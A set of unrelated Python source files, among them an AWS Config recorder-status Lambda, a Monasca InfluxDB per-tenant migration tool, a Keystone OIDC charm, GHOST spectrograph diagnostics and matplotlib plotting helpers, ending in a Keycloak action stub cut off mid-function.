        # Metrics are always published to us-east-1.
        self.cloudwatch = boto3.client(
            'cloudwatch', config=self.config, region_name='us-east-1')
        # Counters accumulated while scanning regions.
        self.AWSConfigRecordersTotal = 0
        self.AWSConfigRecordersEnabled = 0
    def GetRegionsfromAccount(self):
        """Assume the cross-account role, enumerate the account's enabled
        regions, then publish per-region recorder status metrics."""
        print("account:", self.accountid)
        acct_b = self.sts_connection.assume_role(
            RoleArn="arn:aws:iam::" + self.accountid + ":role/AssumedFunctionRole",
            RoleSessionName="cross_acct_lambda"
        )
        # Temporary credentials for the assumed role, reused by the
        # per-region clients created later.
        self.ACCESS_KEY = acct_b['Credentials']['AccessKeyId']
        self.SECRET_KEY = acct_b['Credentials']['SecretAccessKey']
        self.SESSION_TOKEN = acct_b['Credentials']['SessionToken']
        self.ec2 = boto3.client(
            'ec2',
            aws_access_key_id=self.ACCESS_KEY,
            aws_secret_access_key=self.SECRET_KEY,
            aws_session_token=self.SESSION_TOKEN,
            config=self.config
        )
        # Only regions the account can actually use.
        filters = [
            {
                'Name': 'opt-in-status',
                'Values': ['opt-in-not-required', 'opted-in']
            }
        ]
        self.regions = [region['RegionName'] for region in self.ec2.describe_regions(
            Filters=filters)['Regions']]
        self.PublishConfigStatustoCloudwatchforEveryRegion()
    def PublishConfigStatustoCloudwatchforEveryRegion(self):
        """Publish a 0/1 AWSConfigRecordersStatusFlag metric per region,
        followed by account-level summary metrics.

        NOTE(review): only the first recorder (index 0) of each region is
        inspected -- confirm a single recorder per region is guaranteed.
        """
        # NOTE: the loop variable is deliberately stored as an attribute.
        for self.region in self.regions:
            awsconfig = boto3.client(
                'config',
                aws_access_key_id=self.ACCESS_KEY,
                aws_secret_access_key=self.SECRET_KEY,
                aws_session_token=self.SESSION_TOKEN,
                region_name=self.region,
                config=self.config
            )
            try:
                self.config_recorder_response = awsconfig.describe_configuration_recorder_status()
                print("region:", self.region)
                response = self.config_recorder_response["ConfigurationRecordersStatus"]
                print("len of response", len(response))
                if len(response) > 0:
                    index = 0
                    # A recorder exists in this region (recording or not).
                    self.AWSConfigRecordersTotal += 1
                    print("Value of recording:",
                          response[index]['recording'])
                    if response[index]['recording'] == True:
                        print("SUCCESS: {}".format(response))
                        print("SUCCESS: {}".format(
                            response[index]['lastStatus']))
                        print("PUBLISHING SUCCESS")
                        self.AWSConfigRecordersEnabled += 1
                        # Flag value 1: recorder present and recording.
                        response = self.cloudwatch.put_metric_data(
                            MetricData=[
                                {
                                    'MetricName': 'AWSConfigRecordersStatusFlag',
                                    'Dimensions': [
                                        {
                                            'Name': "AccountId",
                                            'Value': self.accountid
                                        },
                                        {
                                            'Name': "Region",
                                            'Value': self.region
                                        },
                                    ],
                                    'Value': 1
                                },
                            ],
                            Namespace='AWSConfigStatus'
                        )
                    else:
                        print("PUBLISHING FAILURE")
                        # Flag value 0: recorder present but not recording.
                        response = self.cloudwatch.put_metric_data(
                            MetricData=[
                                {
                                    'MetricName': 'AWSConfigRecordersStatusFlag',
                                    'Dimensions': [
                                        {
                                            'Name': "AccountId",
                                            'Value': self.accountid
                                        },
                                        {
                                            'Name': "Region",
                                            'Value': self.region
                                        },
                                    ],
                                    'Value': 0
                                },
                            ],
                            Namespace='AWSConfigStatus'
                        )
            except Exception as e:
                # Best effort: a region that cannot be queried is logged
                # and skipped so the remaining regions still get checked.
                print(e)
        print("PUBLISHING SUMMARY")
        cloudwatch = boto3.client(
            'cloudwatch', config=self.config, region_name='us-east-1')
        # NOTE(review): this metric is named 'TotalAWSConfigRecordersEnabled'
        # but publishes AWSConfigRecordersTotal (regions with any recorder,
        # recording or not) -- confirm which value is intended.
        response = cloudwatch.put_metric_data(
            MetricData=[
                {
                    'MetricName': 'TotalAWSConfigRecordersEnabled',
                    'Dimensions': [
                        {
                            'Name': "AccountId",
                            'Value': self.accountid
                        }
                    ],
                    'Value': self.AWSConfigRecordersTotal
                }
            ],
            Namespace='AWSConfigStatus'
        )
        # Number of enabled regions scanned for this account.
        response = cloudwatch.put_metric_data(
            MetricData=[
                {
                    'MetricName': 'TotalRegions',
                    'Dimensions': [
                        {
                            'Name': "AccountId",
                            'Value': self.accountid
                        }
                    ],
                    'Value': len(self.regions)
                }
            ],
            Namespace='AWSConfigStatus'
        )
        # Regions whose recorder is actively recording.
        response = self.cloudwatch.put_metric_data(
            MetricData=[
                {
                    'MetricName': 'AWSConfigRecordersRunning',
                    'Dimensions': [
                        {
                            'Name': "AccountId",
                            'Value': self.accountid
                        }
                    ],
                    'Value': self.AWSConfigRecordersEnabled
                }
            ],
            Namespace='AWSConfigStatus'
        )
def lambda_handler(event, context):
    """Lambda entry point.

    Reads the target account id from
    ``event["detail"]["aws_config_status_check_account"]``, runs the
    Config recorder check for that account and returns a JSON 200
    response.
    """
    _start = time.time()
    print('## EVENT')
    print(event)
    print("I am here", event["detail"]["aws_config_status_check_account"])
    accid = event["detail"]["aws_config_status_check_account"]
    awsconfigcheck = ConfigRecordersCheck(accid)
    awsconfigcheck.GetRegionsfromAccount()
    # BUG FIX: print() does not do logging-style lazy formatting; the
    # original passed "%s" and the value as two arguments, printing the
    # literal placeholder. Apply % formatting explicitly.
    print("Sequential execution time: %s seconds" % (time.time() - _start))
    # TODO implement
    return {
        "statusCode": 200,
        "headers": {
            "Content-Type": "application/json"
        },
        "body": json.dumps({
            "Response ": "SUCCESS"
        }, default=str)
    }
|
# -*- coding: utf-8 -*- #
# Development settings: do not deploy to production with DEBUG enabled.
DEBUG = True
TEMPLATE_DEBUG = DEBUG
# Local time zone for this installation.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en'
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = False
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = False
# Languages offered by the site; additional ones are kept here disabled.
LANGUAGES = (
    ('en', u'English'),
    # ('he', u'Hebrew'),
    # ('ru', u'Russian'),
)
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = False
# Filesystem directories searched for templates (relative path).
TEMPLATE_DIRS = (
    'templates',
)
INSTALLED_APPS = (
)
# NOTE(review): placeholder value -- must be overridden with a real,
# secret value before any deployment.
SECRET_KEY = 'SECRET_KEY'
|
# (C) Copyright 2019 StackHPC Limited.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Monasca InfluxDB tool for migration to database per tenant
Used to move data from monolithic database e.g. `monasca` to a database per
tenant model, e.g. `monasca_<tenant_id>`.
Please see the included README.rst for more details about creating an
appropriate configuration file.
"""
import os
import re
import sys
from monasca_persister import config
from monasca_persister.repositories.influxdb import metrics_repository
from oslo_config import cfg
from oslo_log import log
LOG = log.getLogger(__name__)
MIGRATE_QUERY = ('SELECT * INTO "{target_db}"..:MEASUREMENT'
' FROM "{measurement}"'
' WHERE _tenant_id=\'{tenant_id}\''
' AND time > {lower_time_offset}'
' AND time <= {upper_time_offset}'
' GROUP BY *')
class MigrationHelper(object):
    """Copy metrics from a monolithic InfluxDB database into one database
    per tenant (``<database_name>_<tenant_id>``)."""

    def __init__(self):
        # Reuse the persister's repository so connection settings come
        # from the standard monasca-persister configuration.
        repo = metrics_repository.MetricInfluxdbRepository()
        self.conf = repo.conf
        self.client = repo._influxdb_client
        self.client.switch_database(self.conf.influxdb.database_name)

    def _migrate(self, measurement, tenant_id, start_time_offset,
                 end_time_offset, retention_policy=None, time_unit='w',
                 db_per_tenant=True, **kwargs):
        """Migrate one measurement for a single tenant, one time window
        (of ``time_unit``) at a time, oldest window last.

        :param measurement: measurement name to copy.
        :param tenant_id: tenant whose points are selected.
        :param start_time_offset: most recent window edge, in time units.
        :param end_time_offset: oldest window edge, in time units.
        :param retention_policy: kwargs for create_retention_policy, or
            None/empty to keep the target database default.
            (BUG FIX: was a shared mutable default argument ``{}``.)
        :param time_unit: 'h', 'd' or 'w'.
        :param db_per_tenant: write into ``<db>_<tenant_id>`` when True.
        """
        total_written = 0
        first_upper_time_offset = None
        last_lower_time_offset = None
        time_offset = start_time_offset
        if db_per_tenant:
            target_db = "{}_{}".format(self.conf.influxdb.database_name, tenant_id)
            self.client.create_database(target_db)
            if retention_policy:
                self.client.create_retention_policy(database=target_db, **retention_policy)
            LOG.info(' into {}:'.format(target_db))
        else:
            # BUG FIX: target_db was previously undefined on this path,
            # raising NameError when formatting the query below; fall
            # back to the source database.
            target_db = self.conf.influxdb.database_name
        while end_time_offset > 0 and time_offset < end_time_offset:
            lower_time_offset = 'now()-{}{}'.format(time_offset + 1, time_unit)
            upper_time_offset = 'now()-{}{}'.format(time_offset, time_unit)
            if not first_upper_time_offset:
                first_upper_time_offset = upper_time_offset
            migrate_query = MIGRATE_QUERY.format(
                target_db=target_db,
                measurement=measurement,
                tenant_id=tenant_id,
                lower_time_offset=lower_time_offset,
                upper_time_offset=upper_time_offset,
            )
            LOG.debug(migrate_query)
            written = next(self.client.query(migrate_query).get_points('result')).get('written')
            total_written += written
            time_offset += 1
            if written > 0:
                last_lower_time_offset = lower_time_offset
                LOG.info(" migrated {} entries from {} -> {} (cumulative {})".format(
                    written,
                    lower_time_offset,
                    upper_time_offset,
                    total_written,
                ))
        LOG.info(" finished migrating a total of {} entries from {} -> {}.".format(
            total_written,
            last_lower_time_offset,
            first_upper_time_offset,
        ))

    def get_measurements(self, fname):
        """Return the measurements to migrate.

        If *fname* is given, it is used as a cache: measurements are read
        from it when present, otherwise queried from InfluxDB and written
        back to it.
        """
        measurements = []
        if fname:
            with open(fname, 'a+') as f:
                # BUG FIX: 'a+' opens positioned at end-of-file, so the
                # cached list was never actually read; rewind first.
                f.seek(0)
                measurements = [line.strip() for line in f.readlines()]
        if not measurements:
            result = self.client.query('SHOW MEASUREMENTS').get_points('measurements')
            measurements = [m.get('name') for m in result]
            if fname:
                with open(fname, 'w') as f:
                    for r in measurements:
                        f.write(r + '\n')
        return measurements

    def get_tenancies(self, measurements):
        """Map each measurement to the tenant ids present in it."""
        result = self.client.query("SHOW TAG VALUES WITH KEY = _tenant_id")
        return {m: [t.get('value') for t in result.get_points(m)] for m in measurements}

    def get_complete(self, fname):
        """Return the set of already-migrated measurements recorded in
        *fname* (created if missing); empty set when no file is used."""
        if fname:
            with open(fname, 'a+') as fd:
                # BUG FIX: rewind before reading (see get_measurements).
                fd.seek(0)
                return {line.strip() for line in fd.readlines()}
        # BUG FIX: previously returned {} (an empty dict, not a set).
        return set()

    def migrate(self,
                tenant_defaults=None,
                default_start_time_offset=0,  # Default: now
                default_end_time_offset=520,  # Default: 10 years
                skip_regex=None,
                measurements_file=None, success_file=None, failure_file=None, **kwargs):
        """Migrate every measurement for every tenant.

        :param tenant_defaults: per-tenant overrides for time offsets and
            retention policy. (BUG FIX: was a mutable default ``{}``.)
        :param default_start_time_offset: newest data edge, in time units.
        :param default_end_time_offset: oldest data edge, in time units.
        :param skip_regex: compiled regexes; matching measurements are
            skipped. (BUG FIX: was a mutable default ``[]``.)
        :param measurements_file: optional measurement-list cache file.
        :param success_file: optional progress file of done measurements.
        :param failure_file: optional file recording failures.
        """
        tenant_defaults = tenant_defaults if tenant_defaults is not None else {}
        skip_regex = skip_regex if skip_regex is not None else []
        measurements = self.get_measurements(measurements_file)
        tenancy = self.get_tenancies(measurements)
        done = self.get_complete(success_file)
        default_rp = {}
        hours = self.conf.influxdb.default_retention_hours
        if hours > 0:
            rp = '{}h'.format(hours)
            default_rp = dict(name=rp, duration=rp, replication='1', default=True)
        skip = set()
        fail = set()
        # Failures from a previous run are superseded by this run.
        if failure_file:
            if os.path.exists(failure_file):
                os.remove(failure_file)
        filtered_measurements = []
        for measurement in measurements:
            if any([f.match(measurement) for f in skip_regex]):
                skip.add(measurement)
                LOG.debug('Skipping {} because it matches a skip regex.'.format(measurement))
                continue
            elif measurement in done:
                LOG.debug('Skipping {} because its already done.'.format(measurement))
                continue
            else:
                filtered_measurements.append(measurement)
        for i, measurement in enumerate(filtered_measurements):
            LOG.info('Migrating {}'.format(measurement))
            try:
                for tenant_id in tenancy.get(measurement):
                    start_time_offset = tenant_defaults.get(
                        tenant_id, {}).get('start_time_offset_override',
                                           default_start_time_offset)
                    end_time_offset = tenant_defaults.get(
                        tenant_id, {}).get('end_time_offset_override',
                                           default_end_time_offset)
                    # NOTE (brtknr): Ensure that the default upper and lower
                    # time offsets are respected during migration by the
                    # projects with custom retention policies.
                    start_time_offset = max(default_start_time_offset,
                                            start_time_offset)
                    end_time_offset = min(default_end_time_offset,
                                          end_time_offset)
                    retention_policy = tenant_defaults.get(
                        tenant_id, {}).get('rp', default_rp)
                    self._migrate(measurement, tenant_id,
                                  start_time_offset=start_time_offset,
                                  end_time_offset=end_time_offset,
                                  retention_policy=retention_policy, **kwargs)
                if success_file:
                    with open(success_file, 'a+') as fd:
                        fd.write('{}\n'.format(measurement))
                done.add(measurement)
            except Exception as e:
                LOG.error(e)
                if failure_file:
                    with open(failure_file, 'a+') as fe:
                        fe.write('{}\t{}\n'.format(measurement, e))
                fail.add(measurement)
            LOG.info("{}/{} (done {} + skip {} + fail {})/{}".format(
                i + 1, len(filtered_measurements), len(done), len(skip),
                len(fail), len(measurements)))
def main():
    """Parse CLI options and run the per-tenant migration.

    :returns: 0 on success (used as the process exit code).
    :raises ValueError: if a retention-policy value is not an integer.
    """
    CONF = cfg.CONF
    cli_opts = [
        cfg.StrOpt('migrate-time-unit', choices=['h', 'd', 'w'], default='w',
                   help='Unit of time, h=hour, d=day, w=week (default: "w").'),
        cfg.IntOpt('migrate-start-time-offset', default=0,
                   help='Start time offset in the given unit of time (default: 0).'),
        cfg.IntOpt('migrate-end-time-offset', default=520,
                   help='End time offset in the given unit of time (default: 520).'),
        cfg.DictOpt('migrate-retention-policy', default={},
                    # BUG FIX: adjacent string literals were missing a
                    # separating space ("providedtime unit").
                    help=('Custom retention policy for projects in the provided '
                          'time unit. (e.g. project-id-x:2,project-id-y:4)')),
        cfg.ListOpt('migrate-skip-regex', default=[],
                    # BUG FIX: missing space ("patterns.(e.g.").
                    help=('Skip metrics that match this comma separated list of regex patterns. '
                          '(e.g. ^log\\\\..+,^cpu\\\\..+ to skip metrics beginning with log.)')),
    ]
    CONF.register_cli_opts(cli_opts)
    config.parse_args("Monasca InfluxDB database per tenant migration tool")
    # Configure custom retention policy for your existing projects. For
    # example, rp2w is a retention policy of two weeks which we can assign to
    # project example-project-id.
    tenant_defaults = dict()
    for k, v in CONF.migrate_retention_policy.items():
        if v.isdigit():
            rp = '{}{}'.format(v, CONF.migrate_time_unit)
            tenant_defaults[k] = dict(
                end_time_offset_override=int(v),
                rp=dict(name=rp, duration=rp, replication='1', default=True),
            )
            LOG.info('Project {} will be applied retention policy: {}.'.format(k, rp))
        else:
            # BUG FIX: the concatenated message lacked spaces, producing
            # "...must be aninteger ... Current value:<v>.".
            raise ValueError('Retention policy for project {} must be an '
                             'integer of given time unit. Current value: '
                             '{}.'.format(k, v))
    skip_regex = []
    for p in CONF.migrate_skip_regex:
        skip_regex.append(re.compile(str(p)))
        LOG.info('Metrics matching pattern "{}" will be skipped.'.format(p))
    helper = MigrationHelper()
    helper.migrate(skip_regex=skip_regex,
                   tenant_defaults=tenant_defaults,
                   default_end_time_offset=CONF.migrate_end_time_offset,
                   default_start_time_offset=CONF.migrate_start_time_offset,
                   time_unit=CONF.migrate_time_unit,
                   measurements_file='migrate-measurements',
                   success_file='migrate-success',
                   failure_file='migrate-failure')
    return 0
if __name__ == "__main__":
    sys.exit(main())
|
#
# Copyright 2017 Canonical Ltd
# Copyright 2020 Consortium GARR
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import charmhelpers.core as core
import charmhelpers.core.host as ch_host
import charmhelpers.core.hookenv as hookenv
import charmhelpers.contrib.openstack.templating as os_templating
import charms_openstack.charm
import charms_openstack.adapters
import os
import subprocess
# the /etc/apache2/mellon directory is automatically parsed by keystone
# see https://github.com/openstack/charm-keystone/commit/6f3751cc96a910b07a122171cf43eee0b2852ecb
CONFIGS = (OIDC_LOCATION_CONFIG, OIDC_CONF) = [os.path.join('/etc/apache2/mellon/',
'sp-location-oidc.conf'),
os.path.join('/etc/apache2/conf-enabled/',
'oidc.conf')]
class KeystoneOIDCConfigurationAdapter(
        charms_openstack.adapters.ConfigurationAdapter):
    """Configuration adapter exposing OIDC-specific derived options to
    the charm's templates."""
    def __init__(self, charm_instance=None):
        super().__init__(charm_instance=charm_instance)
        # Per-option validation messages, keyed by option name.
        self._validation_errors = {}
    @property
    def validation_errors(self):
        """Only the options that actually failed validation."""
        return {k: v for k, v in
                self._validation_errors.items() if v}
    @property
    def remote_id_attribute(self):
        # Apache request variable keystone uses to identify the IdP.
        return "HTTP_OIDC_ISS"
    @property
    def oidc_location_config(self):
        # Rendered Apache <Location> snippet path.
        return OIDC_LOCATION_CONFIG
    @property
    def oidc_conf(self):
        # Rendered mod_auth_openidc configuration path.
        return OIDC_CONF
    @property
    def websso_auth_path(self):
        """WebSSO auth endpoint for this protocol."""
        return ('/v3/auth/OS-FEDERATION/websso/{}'.format(
            self.protocol_name
        ))
    @property
    def websso_auth_protocol_path(self):
        """Regex path matching federation auth for any identity provider."""
        return ('/v3/OS-FEDERATION/identity_providers/.*?'
                '/protocols/{}/auth'.format(
                    self.protocol_name
                ))
    @property
    def websso_auth_idp_protocol_path(self):
        """WebSSO path scoped to the configured identity provider."""
        return ('/v3/auth/OS-FEDERATION/identity_providers'
                '/{}/protocols/{}/websso'.format(
                    self.idp_name,
                    self.protocol_name
                ))
class KeystoneSAMLOIDCCharm(charms_openstack.charm.OpenStackCharm):
    """Subordinate charm configuring keystone federation via
    mod_auth_openidc.

    NOTE(review): the class name and several comments below still say
    SAML/mellon; this appears inherited from the keystone-saml-mellon
    charm this code was derived from -- confirm.
    """
    # Internal name of charm
    service_name = name = 'keystone-oidc'
    # Package to derive application version from
    version_package = 'keystone'
    # First release supported
    release = 'stein'
    release_pkg = 'keystone-common'
    # Required relations
    required_relations = [
        'keystone-fid-service-provider',
        'websso-fid-service-provider']
    # List of packages to install for this charm
    packages = ['libapache2-mod-auth-openidc']
    configuration_class = KeystoneOIDCConfigurationAdapter
    group = 'www-data'
    # Config files whose change should trigger a service restart.
    restart_map = {
        OIDC_LOCATION_CONFIG: [],
        OIDC_CONF: [],
    }
    def configuration_complete(self):
        """Determine whether sufficient configuration has been provided
        via charm config options and resources.
        :returns: boolean indicating whether configuration is complete
        """
        required_config = {
            'oidc-claim-prefix': self.options.oidc_claim_prefix,
            'oidc-response-type': self.options.oidc_response_type,
            'oidc-scope': self.options.oidc_scope,
            'oidc-provider-metadata-url': self.options.oidc_provider_metadata_url,
            'oidc-client-id': self.options.oidc_client_id,
            'oidc-client-secret': self.options.oidc_client_secret,
            'oidc-crypto-passphrase': self.options.oidc_crypto_passphrase,
            'oidc-redirect-uri': self.options.oidc_redirect_uri,
            'idp-name': self.options.idp_name,
            'protocol-name': self.options.protocol_name,
        }
        return all(required_config.values())
    def custom_assess_status_check(self):
        """Custom asses status.
        Check the configuration is complete.
        :returns: ('blocked', message) when incomplete, (None, None) otherwise.
        """
        if not self.configuration_complete():
            errors = [
                '{}: {}'.format(k, v)
                for k, v in self.options.validation_errors.items()]
            status_msg = 'Configuration is incomplete. {}'.format(
                ','.join(errors))
            return 'blocked', status_msg
        # Nothing to report
        return None, None
    def render_config(self, *args):
        """
        Render Service Provider configuration file to be used by Apache
        and provided to idP out of band to establish mutual trust.
        """
        owner = 'root'
        group = 'www-data'
        # group read and exec is needed for mellon to read the rendered
        # files, otherwise it will fail in a cryptic way
        # NOTE(review): 0o650 grants the owner no execute bit on the
        # directory (rw-/r-x/---), which prevents root traversing it by
        # permission (root bypasses checks) -- confirm 0o750 was intended.
        dperms = 0o650
        # file permissions are a bit more restrictive than defaults in
        # charm-helpers but directory permissions are the main protection
        # mechanism in this case
        fileperms = 0o440
        # ensure that a directory we need is there
        # NOTE(review): the /etc/apache2/mellon path is kept because
        # keystone parses that directory (see module-level comment).
        ch_host.mkdir('/etc/apache2/mellon', perms=dperms, owner=owner,
                      group=group)
        core.templating.render(
            source='apache-oidc-location.conf',
            template_loader=os_templating.get_loader(
                'templates/', self.release),
            target=self.options.oidc_location_config,
            context=self.adapters_class(args, charm_instance=self),
            owner=owner,
            group=group,
            perms=fileperms
        )
        core.templating.render(
            source='oidc.conf',
            template_loader=os_templating.get_loader(
                'templates/', self.release),
            target=self.options.oidc_conf,
            context=self.adapters_class(args, charm_instance=self),
            owner=owner,
            group=group,
            perms=fileperms
        )
    def remove_config(self):
        """Delete every rendered configuration file that exists."""
        for f in self.restart_map.keys():
            if os.path.exists(f):
                os.unlink(f)
    def enable_module(self):
        """Enable the Apache mod_auth_openidc module."""
        subprocess.check_call(['a2enmod', 'auth_openidc'])
    def disable_module(self):
        """Disable the Apache mod_auth_openidc module."""
        subprocess.check_call(['a2dismod', 'auth_openidc'])
|
#!/usr/bin/env python3
"""A script to do diagnostic checks on reduced ghost data.
It displays several windows showing how good the fits are and a few other things
This script should be ran from within the finished reduction folder, which
should contain the 'calibrations/' directory that are needed and finished
reduction files (extracted profiles/barycentric corrected)
"""
from __future__ import division, print_function
import numpy as np
from ghostdr.ghost import polyfit
import glob
import os
import sys
import astropy.io.fits as pyfits
import ghostdr.ghost.lookups as lookups
import ghostdr.ghost.lookups.polyfit_dict as polyfit_dict
import pylab as pl
from cycler import cycler
import input_locations
# User whose input_locations configuration is loaded below.
user='joao'
def plot_arcs(arc_data, thar_spec, w_map, title):
    """ Function used to plot two panels, one containing the extracted arc
    with the ThAr lamp spectrum superimposed, and one containing the difference
    between the two, to look for particularly bad regions of the fit.
    Parameters
    ----------
    arc_data:
        Extracted arc flux indexed as [order, pixel, object]; the last
        axis is assumed to hold exactly 3 objects -- TODO confirm.
    thar_spec:
        Two-row ThAr template: thar_spec[0] wavelengths, thar_spec[1] flux.
        NOTE(review): thar_spec[1] is rescaled in place inside the loop
        below, mutating the caller's array.
    w_map:
        Wavelength map matching arc_data's order/pixel axes.
    title:
        Figure title.
    """
    # Alternate line colours so adjacent orders are distinguishable.
    pl.rc('axes', prop_cycle=(cycler('color', ['b', 'r'])))
    f, axes = pl.subplots(3, 1, sharex='all')
    f.suptitle(title)
    # We always have 3 objects
    for obj in range(3):
        axes[obj].plot(w_map.T, arc_data[:, :, obj].T)
        axes[obj].set_title('Object %s' % (str(obj + 1)))
        # Restrict the template to the wavelength span of this arm.
        thar_range = np.where((thar_spec[0] > w_map.min())
                              & (thar_spec[0] < w_map.max()))
        # Normalise the template peak to this object's peak flux (the
        # rescale is self-normalising, so repeating it per object is safe).
        thar_spec[1] = thar_spec[1] * (arc_data[:, :, obj].max() /
                                       thar_spec[1][thar_range].max())
        axes[obj].plot(thar_spec[0][thar_range], thar_spec[1][thar_range],
                       ls='-.',
                       color='green')
    pl.show()
# Let's start by checking the fits. We use the same method as the slider adjust
# and let the user check things individually.
flat_list = glob.glob('calibrations/processed_flat/*flat.fits')
arc_list = glob.glob('calibrations/processed_arc/*arc.fits')
# Resolution modes and camera arms inspected by default.
modes = ['high', 'std']
cams = ['blue', 'red']
# Now cycle through available modes. or just the ones required
# by detecting particular keywords in the sys arguments.
if len(sys.argv) > 1:
    if 'high' in sys.argv:
        modes = ['high']
    if 'std' in sys.argv:
        modes = ['std']
    if 'red' in sys.argv:
        cams = ['red']
    if 'blue' in sys.argv:
        cams = ['blue']
for mode in modes:
    for cam in cams:
        files = input_locations.Files(user=user, mode=mode, cam=cam)
        ghost = polyfit.ghost.GhostArm(cam, mode=mode)
        print('Inspecting flat and arc fits from the %s camera in %s mode' %
              (cam, mode))
        # Find the default models for things not inspected
        rotparams = files.rotparams
        specparams = files.specparams
        spatparams = files.spatparams
        wparams = files.waveparams
        # First flat file whose path mentions both this cam and mode.
        flat_file_location = [value for value in flat_list if cam in value
                              and mode in value][0]
        flat_file = pyfits.open(flat_file_location)
        print('Inspecting file %s' % (flat_file_location))
        xparams = flat_file['XMOD'].data
        dummy = ghost.spectral_format_with_matrix(xparams, wparams,
                                                  spatparams, specparams,
                                                  rotparams)
        flat_conv = ghost.slit_flat_convolve(flat_file['SCI'].data)
        # Interactive inspection: once over the convolved flat, once over
        # the raw flat image.
        plot_title = 'Convolution plot for camera %s in %s mode.' % (cam, mode)
        adjusted_params=ghost.manual_model_adjust(flat_conv,
                                                  model = 'position',
                                                  xparams = xparams,
                                                  percentage_variation = 10,
                                                  title = plot_title)
        plot_title='Regular flat for camera %s in %s mode.' % (cam, mode)
        adjusted_params=ghost.manual_model_adjust(flat_file['SCI'].data,
                                                  model='position',
                                                  xparams=xparams,
                                                  percentage_variation=10,
                                                  title=plot_title)
        # Now the arcs
        arcs_list=[value for value in arc_list
                   if cam in value and mode in value]
        for arc in arcs_list:
            print('Inspecting file %s' % (arc))
            arc_file=pyfits.open(arc)
            # Use this arc's own wavelength fit with the flat's x model.
            wparams=arc_file['WFIT'].data
            arc_data=arc_file['SCI'].data
            dummy=ghost.spectral_format_with_matrix(xparams, wparams,
                                                    spatparams, specparams,
                                                    rotparams)
            plot_title='Arc %s with superimposed template in green.' % (arc)
            thar_spec = files.thar_spectrum(files.arclinefile)
            plot_arcs(arc_data, thar_spec, ghost.w_map, title=plot_title)
|
from .encoding_controller import blp
|
from django.views.generic import TemplateView
class HomeView(TemplateView):
    """Render the site's static home page."""
    template_name = 'main/home.html'
|
from fidget.backend.QtWidgets import QHBoxLayout
from fidget.widgets import FidgetMinimal, FidgetInt, FidgetTuple, inner_fidget, SimplePlainEdit
from fidget.tests.gui.__util__ import test_as_main
# Manual GUI test: a minimal fidget wrapping an (X, Y) integer tuple,
# edited through a plain-text outer widget.
@test_as_main()
class MinInt(FidgetMinimal):
    MAKE_TITLE = True
    OUTER_TEMPLATE = SimplePlainEdit.template('outer')
    # Inner widget: two integer fields laid out horizontally.
    @inner_fidget('sample')
    class _(FidgetTuple):
        MAKE_TITLE = False
        LAYOUT_CLS = QHBoxLayout
        MAKE_PLAINTEXT = True
        INNER_TEMPLATES = [
            FidgetInt.template('X'),
            FidgetInt.template('Y'),
        ]
|
# -*- coding: utf-8 -*-
##############################################
# The MIT License (MIT)
# Copyright (c) 2017 Kevin Walchko
# see LICENSE for full details
##############################################
from collections import namedtuple
import time
class Data(namedtuple('Data', 'data timestamp')):
    """
    Generic data container with a timestamp.
    data = tuple of data
    timestamp = from time.time(), where it is measured in seconds
    """
    __slots__ = ()
    def __new__(cls, d, ts=None):
        """Create a record; *ts* defaults to the current time.

        BUG FIX: the original tested ``if ts:``, so a legitimate
        timestamp of 0 (the epoch) was silently replaced with the current
        time; compare against None instead. Also use super().__new__
        rather than reaching into ``cls.__bases__`` directly, which is
        fragile under further subclassing.
        """
        if ts is None:
            ts = time.time()
        return super().__new__(cls, d, ts)
|
####
# plot_creation.py
#
# Functions will be in charge of creating plots using matplotlib
# and then converting them into html string so that they can be
# posted onto the webpages as images
###
import pandas as pd
import matplotlib
import matplotlib.figure as figure
import base64
from io import BytesIO
# Function creates html string given a figure.Figure() object
# @para fig:
# @return: html string that will be used to load the image
# this string can be inserted in src for html script. Ex:
# <img src='HTML_STRING'/>
def create_html_string(fig):
    """Render *fig* as a PNG and return it as a base64 data-URI string.

    The returned value can be used directly as the ``src`` attribute of
    an ``<img>`` tag, e.g. ``<img src='...'/>``.
    """
    buffer = BytesIO()
    fig.savefig(buffer, format="png")
    # Embed the PNG bytes in the page as a base64 data URI.
    encoded = base64.b64encode(buffer.getbuffer()).decode("ascii")
    return f'data:image/png;base64,{encoded}'
# Creates scatter plot that compares x and y axis parameters
# @para x: array of x-axis values
# @para x_l: string of x-axis value
# @para y: array of y-axis values
# @para y_l: string of y-axis value
# @para title: string title of plot
# @return: html string that will load the image (refer to create_html_string()
# function for more details)
def create_scatter_html(x, x_l, y, y_l, title):
    """Build a scatter plot of *y* against *x*, labelled with *x_l*,
    *y_l* and *title*, and return it as an HTML-embeddable base64 data
    URI (see create_html_string)."""
    chart = figure.Figure()
    axes = chart.add_subplot()
    axes.scatter(x=x, y=y)
    axes.set_xlabel(x_l)
    axes.set_ylabel(y_l)
    axes.set_title(title)
    return create_html_string(chart)
# Creates barchart that compares given x paramaters, graphs output
# their heights based on height instance
# @para x: array of x-axis values
# @para x_l: string of x-axis value
# @para height: array of heights for given x values
# @para height_l: string of label for heights
# @para title: string title of plot
# @return: html string that will load the image (refer to create_html_string()
# function for more details)
def create_bar_html(x, x_l, height, height_l, title):
    """Build a bar chart of *height* values for the categories in *x*,
    labelled with *x_l*, *height_l* and *title*, and return it as an
    HTML-embeddable base64 data URI (see create_html_string)."""
    chart = figure.Figure()
    axes = chart.add_subplot()
    axes.bar(x=x, height=height)
    axes.set_xlabel(x_l)
    axes.set_ylabel(height_l)
    axes.set_title(title)
    return create_html_string(chart)
from lib import action
class KeycloakDeleteClientRoleAction(action.KeycloakBaseAction):
    # StackStorm action: delete a Keycloak client role by name.
    def run(self, role_name):
